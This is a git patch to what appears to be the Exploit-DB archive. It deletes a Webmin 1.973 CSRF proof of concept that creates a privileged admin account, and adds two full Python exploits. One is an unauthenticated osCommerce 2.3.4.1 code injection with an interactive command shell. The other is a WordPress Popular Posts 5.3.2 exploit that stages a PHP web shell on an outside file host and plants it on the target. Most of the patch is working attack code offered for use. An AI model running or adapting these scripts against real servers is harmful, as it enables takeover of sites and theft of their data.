From 680397ce33f9bfec3b2a688dbb94099f5b5cfa55 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Fri, 16 Jul 2021 05:01:53 +0000 Subject: [PATCH] DB: 2021-07-16 4 changes to exploits/shellcodes Webmin 1.973 - Cross-Site Request Forgery (CSRF) osCommerce 2.3.4.1 - Remote Code Execution (2) WordPress Plugin Popular Posts 5.3.2 - Remote Code Execution (RCE) (Authenticated) --- exploits/linux/webapps/50126.py | 230 --------------------------- exploits/php/webapps/50128.py | 89 +++++++++++ exploits/php/webapps/50129.py | 271 ++++++++++++++++++++++++++++++++ files_exploits.csv | 3 +- 4 files changed, 362 insertions(+), 231 deletions(-) delete mode 100755 exploits/linux/webapps/50126.py create mode 100755 exploits/php/webapps/50128.py create mode 100755 exploits/php/webapps/50129.py diff --git a/exploits/linux/webapps/50126.py b/exploits/linux/webapps/50126.py deleted file mode 100755 index 30c9c6946..000000000 --- a/exploits/linux/webapps/50126.py +++ /dev/null @@ -1,230 +0,0 @@ -# Exploit Title: Webmin 1.973 - Cross-Site Request Forgery (CSRF) -# Date: 24/04/2021 -# Exploit Author: *Mesh3l_911 & Z0ldyck -# Vendor Homepage: https://www.webmin.com -# Repo Link: https://github.com/Mesh3l911/CVE-2021-31762 -# Version: Webmin 1.973 -# Tested on: All versions <= 1.973 -# CVE : CVE-2021-31762 -# POC: https://youtu.be/qCvEXwyaF5U - - -import time, subprocess - -print('''\033[1;37m - - __ __ _ ____ _ _________ _ _ _ -| \/ | | | |___ \| | |___ / _ \| | | | | | -| \ / | ___ ___| |__ __) | | / / | | | | __| |_ _ ___| | __ -| |\/| |/ _ \/ __| '_ \ |__ <| | / /| | | | |/ _` | | | |/ __| |/ / -| | | | __/\__ \ | | |___) | | _ _ / /_| |_| | | (_| | |_| | (__| < -|_| |_|\___||___/_| |_|____/|_| (_|_) /_____\___/|_|\__,_|\__, |\___|_|\_/ - __/ | - |___/ - - \033[1;m''') - -for i in range(101): - print( - "\r\033[1;36m [>] POC By \033[1;m \033[1;37mMesh3l\033[1;m \033[1;36m ( \033[1;m\033[1;37m@Mesh3l_911\033[1;m\033[1;36m ) & \033[1;m \033[1;37mZ0ldyck\033[1;m\033[1;36m ( \033[1;m\033[1;37m@electronicbots\033[1;m\033[1;36m ) \033[1;m {} \033[1;m".format( - i), "\033[1;36m%\033[1;m", end="") - time.sleep(0.02) -print("\n\n") - -target = input( - "\033[1;36m \nPlease input ur target's webmin path e.g. ( https://webmin.Mesh3l-Mohammed.com/ ) > \033[1;m") - -if target.endswith('/'): - target = target + 'acl/save_user.cgi' -else: - target = target + '/acl/save_user.cgi' - - -def CSRF_Generator(): - with open('CSRF_POC.html', 'w') as POC: - POC.write \ - (''' - - - - - - - -
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- - - - - - ''') - POC.close() - - print( - "\033[1;36m\nThe CSRF_POC has been generated successfully , send it to a Webmin's Admin and ur privileged user creds would be \n\nUsername: \033[1;m\033[1;37mMesh3l_Z0ldyck\033[1;m\n\033[1;36mPassword:\033[1;m \033[1;37mMesh3l_Z0ldyck123\n\033[1;m\n\n\033[1;36mHappy Hunting ^_^ \n\033[1;m") - - - -def main(): - CSRF_Generator() - - -if __name__ == '__main__': - main() \ No newline at end of file diff --git a/exploits/php/webapps/50128.py b/exploits/php/webapps/50128.py new file mode 100755 index 000000000..012c61cfb --- /dev/null +++ b/exploits/php/webapps/50128.py @@ -0,0 +1,89 @@ +# Exploit Title: osCommerce 2.3.4.1 - Remote Code Execution (2) +# Vulnerability: Remote Command Execution when /install directory wasn't removed by the admin +# Exploit: Exploiting the install.php finish process by injecting php payload into the db_database parameter & read the system command output from configure.php +# Notes: The RCE doesn't need to be authenticated +# Date: 26/06/2021 +# Exploit Author: Bryan Leong +# Vendor Homepage: https://www.oscommerce.com/ +# Version: osCommerce 2.3.4 +# Tested on: Windows + +import requests +import sys + +if(len(sys.argv) != 2): + print("please specify the osCommerce url") + print("format: python3 osCommerce2_3_4RCE.py ") + print("eg: python3 osCommerce2_3_4RCE.py http://localhost/oscommerce-2.3.4/catalog") + sys.exit(0) + +baseUrl = sys.argv[1] +testVulnUrl = baseUrl + '/install/install.php' + +def rce(command): + #targeting the finish step which is step 4 + targetUrl = baseUrl + '/install/install.php?step=4' + + payload = "');" + payload += "passthru('" + command + "');" # injecting system command here + payload += "/*" + + #injecting parameter + data = { + 'DIR_FS_DOCUMENT_ROOT': './', + 'DB_DATABASE' : payload + } + + response = requests.post(targetUrl, data=data) + + if(response.status_code == 200): + #print('[*] Successfully injected payload to config file') + + readCMDUrl = baseUrl + '/install/includes/configure.php' + cmd = requests.get(readCMDUrl) + + commandRsl = cmd.text.split('\n') + + if(cmd.status_code == 200): + #print('[*] System Command Execution Completed') + #removing the error message above + for i in range(2, len(commandRsl)): + print(commandRsl[i]) + else: + return '[!] Configure.php not found' + + + else: + return '[!] Fail to inject payload' + + + +#testing vulnerability accessing the directory +test = requests.get(testVulnUrl) + +#checking the install directory still exist or able to access or not +if(test.status_code == 200): + print('[*] Install directory still available, the host likely vulnerable to the exploit.') + + #testing system command injection + print('[*] Testing injecting system command to test vulnerability') + cmd = 'whoami' + + print('User: ', end='') + err = rce(cmd) + + if(err != None): + print(err) + sys.exit(0) + + while(True): + cmd = input('RCE_SHELL$ ') + err = rce(cmd) + + if(err != None): + print(err) + sys.exit(0) + +else: + print('[!] Install directory not found, the host is not vulnerable') + sys.exit(0) \ No newline at end of file diff --git a/exploits/php/webapps/50129.py b/exploits/php/webapps/50129.py new file mode 100755 index 000000000..71ddf3c0c --- /dev/null +++ b/exploits/php/webapps/50129.py @@ -0,0 +1,271 @@ +# Exploit Title: WordPress Plugin Popular Posts 5.3.2 - Remote Code Execution (RCE) (Authenticated) +# Date: 15/07/2021 +# Exploit Author: Simone Cristofaro +# Vendor Homepage: https://it.wordpress.org/plugins/wordpress-popular-posts/ +# Software Link: https://downloads.wordpress.org/plugin/wordpress-popular-posts.5.3.2.zip +# Version: 5.3.2 or below +# Tested on: Debian 10, WordPress 5.7.2, PHP version 7.3.27 +# Reference: https://blog.nintechnet.com/improper-input-validation-fixed-in-wordpress-popular-posts-plugin/ +# Notes: It's required that the Popular Posts widget is active (ie. in the footer section) and gd extension for PHP is +# enabled (otherwise WPP can't generate thumbnails). Also, the authenticated user must have "Contributor" role or above. + +# This script will login with the provided credentials, create a new post and add a custom field with the link to a +# web shell, that will be automatically downloaded by the server. If you don't want to upload the file, you need to +# provide a URL to a web shell with SSL support (https) and make sure it contains the file name in it. If the plugin is +# set to show a fixed number of popular posts (ie. top 5), you just need to refresh the post page to make it go up ;) + +''' +Banner: +''' +banner = """ +* Wordpress Popular Posts plugin <= 5.3.2 - RCE (Authenticated) +* @Heisenberg +""" +print(banner) + +''' +Import required modules: +''' +import requests +import argparse +import json +import re +''' +User-Input: +''' +my_parser = argparse.ArgumentParser(description='Wordpress Popular Posts plugin <= 5.3.2 - RCE (Authenticated)') +my_parser.add_argument('-t', help='--Target IP', metavar='IP', type=str, required=True, dest="target_ip") +my_parser.add_argument('-p', help='--Target port', type=str, metavar='PORT', default='80', dest="target_port") +my_parser.add_argument('-w', help='--Wordpress path (ie. /wordpress/)',metavar='PATH', type=str, required=True, dest="wp_path") +my_parser.add_argument('-U', help='--Username', metavar='USER', type=str, required=True, dest="username") +my_parser.add_argument('-P', help='--Password', metavar='PASS', type=str, required=True, dest="password") +args = my_parser.parse_args() +target_ip = args.target_ip +target_port = args.target_port +wp_path = args.wp_path +username = args.username +password = args.password + +''' +# Hard coded parameters (if you don't like command line execution) +target_ip = "localhost" +target_port = "80" +wp_path = "/wordpress/" +username = "heisenberg" +password = "heisenberg" +''' + +shell_name = 'exploit.gif.php' +payload = 'GIF
  
' + +print('') +print('[*] Starting Exploit:') + +''' +Upload file +''' +file_json = requests.post('https://api.bayfiles.com/upload', files={ 'file' : (shell_name, payload)}) +resp = json.loads(file_json.text) +if resp['status']: + urlshort = resp['data']['file']['url']['full'] +else: + print(f'[-] Error:'+ resp['error']['message']) + exit() + +file_uploaded_site = requests.get(urlshort).text +PHP_URL = re.findall(r"(https?://\S+)("+shell_name+")",file_uploaded_site)[0][0] + shell_name + +print(f'[+] Web Shell successfully uploadad at [{PHP_URL}].') + +''' +Authentication: +''' +session = requests.Session() +auth_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-login.php' + +# Header: +header = { + 'Host': target_ip, + 'User-Agent': 'Monies Browser 1.0', + 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', + 'Accept-Language': 'de,en-US;q=0.7,en;q=0.3', + 'Accept-Encoding': 'gzip, deflate', + 'Content-Type': 'application/x-www-form-urlencoded', + 'Origin': 'http://' + target_ip, + 'Connection': 'close', + 'Upgrade-Insecure-Requests': '1' +} + +# Body: +body = { + 'log': username, + 'pwd': password, + 'wp-submit': 'Log In', + 'testcookie': '1' +} + +# Authenticate: +auth = session.post(auth_url, headers=header, data=body) +auth_header = auth.headers['Set-Cookie'] +if 'wordpress_logged_in' in auth_header: + print(f'[+] Authentication successfull as user [{username}] !') +else: + print('[-] Authentication failed ! Check username and password') + exit() + +''' +Verify that the requirements are installed +''' +settings_page_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-admin/options-general.php?page=wordpress-popular-posts&tab=debug' +settings_page = session.get(settings_page_url).text +search_string = ' gd' +if settings_page.find(search_string) == -1 : + print('[-] Error, gd extension for PHP is not installed/enabled on the server ! WPP can\'t generate thumbnails.') + exit() + +''' +Get the wpp-admin-token +''' +settings_page_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-admin/options-general.php?page=wordpress-popular-posts&tab=tools' + +settings_page = session.get(settings_page_url).text +search_string = '' +settings_page = settings_page[settings_page.find(search_string):] +wpp_admin_token = settings_page[72: settings_page.find(search_string_end)] +if wpp_admin_token: + print(f'[+] Acquired wpp-admin-token [{wpp_admin_token}].') +else: + print('[-] Error while gathering wpp-admin-token !') + exit() + +''' +Apply changes to the Popular Posts plugin +''' +body = { + 'upload_thumb_src': '', + 'thumb_source': 'custom_field', + 'thumb_lazy_load': 1, + 'thumb_field': 'wpp_thumbnail', + 'thumb_field_resize': 1, + 'section': 'thumb', + 'wpp-admin-token': wpp_admin_token +} +applied_changes = session.post(settings_page_url, headers=header, data=body).text +if applied_changes.find('

Settings saved.'): + print(f'[+] Settings applied successfully to the Popular Posts plugin. ') +else: + print('[-] Error while applying settings o the Popular Posts plugin!') + exit() + +''' +Empty image cache +''' +body = { + 'action': 'wpp_clear_thumbnail', + 'wpp-admin-token': wpp_admin_token +} +applied_changes = session.post(settings_page_url, headers=header, data=body).text +print(f'[+] Images cache cleared. ') + + +''' +Get the new post ID and Nonce +''' +new_post_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-admin/post-new.php' + +new_post_page = session.get(new_post_url).text +search_string = 'name="_ajax_nonce-add-meta" value="' +search_string_end = '" />' +new_post_page = new_post_page[new_post_page.find(search_string)+35:] +ajax_nonce = new_post_page[:new_post_page.find(search_string_end)] + +search_string = 'wp.apiFetch.nonceMiddleware = wp.apiFetch.createNonceMiddleware( "' +search_string_end = '" );' +new_post_page = new_post_page[new_post_page.find(search_string)+66:] +wp_nonce = new_post_page[:new_post_page.find(search_string_end)] + +search_string = '},"post":{"id":' +search_string_end = ',' +new_post_page = new_post_page[new_post_page.find(search_string)+15:] +post_ID = new_post_page[:new_post_page.find(search_string_end)] + +if post_ID and wp_nonce and ajax_nonce: + print(f'[+] Acquired new post ID [{post_ID}], WP Nonce [{wp_nonce}] and AJAX Nonce [{ajax_nonce}].') +else: + if not post_ID: print('[-] Error while gathering post_ID !') + elif not wp_nonce: print('[-] Error while gathering Wordpress Nonce !') + elif not ajax_nonce : print('[-] Error while gathering Wordpress AJAX Nonce !') + exit() + +''' +Publish a new post +''' +new_post_url = 'http://' + target_ip + ':' + target_port + wp_path + 'index.php/wp-json/wp/v2/posts/'+post_ID+'?_locale=user' + +data = {"id":post_ID,"title":"I'm the one who knocks","content":"\n

upgrade your plugins

\n","status":"publish"} +header['X-WP-Nonce'] = wp_nonce +header['Content-Type'] = 'application/json' +header['X-HTTP-Method-Override'] = 'PUT' +new_post_page = session.post(new_post_url, headers=header, json=data).text +if new_post_page.find('"status":"publish"'): + print(f'[+] New post named [I\'m the one who knocks] published correctly!') +else: + print('[-] Error while publishing the new post !') + exit() + +''' +Add the Custom Filed +''' +new_post_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-admin/admin-ajax.php' + +header.pop('X-WP-Nonce') +header['Content-Type'] = 'application/x-www-form-urlencoded; charset=UTF-8' +header.pop('X-HTTP-Method-Override') +header['Accept']='*/*' +header['X-Requested-With'] = 'XMLHttpRequest' +body = { + '_ajax_nonce': 0, + 'action': 'add-meta', + 'metakeyselect': 'wpp_thumbnail', + 'metakeyinput': "", + 'metavalue' : PHP_URL, + '_ajax_nonce-add-meta': ajax_nonce, + 'post_id' : post_ID +} +new_post_page = session.post(new_post_url, headers=header, data=body).text + +if new_post_page.find(" Webshell: http://' + target_ip + ':' + target_port + wp_path + 'wp-content/uploads/wordpress-popular-posts/' + post_ID +'_'+ shell_name) +print('') \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index b9ebb371d..0312d7284 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -26042,7 +26042,6 @@ id,file,description,date,author,type,platform,port 12866,exploits/php/webapps/12866.txt,"K9 Kreativity Design - 'pages.php' SQL Injection",2010-06-03,Newbie_Campuz,webapps,php, 12867,exploits/php/webapps/12867.txt,"clickartweb Design - SQL Injection",2010-06-03,cyberlog,webapps,php, 12868,exploits/php/webapps/12868.txt,"Joomla! Component com_lead - SQL Injection",2010-06-03,ByEge,webapps,php, -50126,exploits/linux/webapps/50126.py,"Webmin 1.973 - Cross-Site Request Forgery (CSRF)",2021-07-14,Mesh3l_911,webapps,linux, 49439,exploits/php/webapps/49439.txt,"Life Insurance Management System 1.0 - 'client_id' SQL Injection",2021-01-18,"Aitor Herrero",webapps,php, 49440,exploits/php/webapps/49440.txt,"Life Insurance Management System 1.0 - File Upload RCE (Authenticated)",2021-01-18,"Aitor Herrero",webapps,php, 49441,exploits/php/webapps/49441.txt,"osTicket 1.14.2 - SSRF",2021-01-19,"Talat Mehmood",webapps,php, @@ -44263,3 +44262,5 @@ id,file,description,date,author,type,platform,port 50122,exploits/php/webapps/50122.rb,"OpenEMR 5.0.1.3 - 'manage_site_files' Remote Code Execution (Authenticated) (2)",2021-07-13,"Alexandre ZANNI",webapps,php, 50123,exploits/php/webapps/50123.py,"Garbage Collection Management System 1.0 - SQL Injection + Arbitrary File Upload",2021-07-13,"Luca Bernardi",webapps,php, 50127,exploits/php/webapps/50127.txt,"WordPress Plugin Current Book 1.0.1 - 'Book Title and Author field' Stored Cross-Site Scripting (XSS)",2021-07-14,"Vikas Srivastava",webapps,php, +50128,exploits/php/webapps/50128.py,"osCommerce 2.3.4.1 - Remote Code Execution (2)",2021-07-15,"Bryan Leong",webapps,php, +50129,exploits/php/webapps/50129.py,"WordPress Plugin Popular Posts 5.3.2 - Remote Code Execution (RCE) (Authenticated)",2021-07-15,"Simone Cristofaro",webapps,php,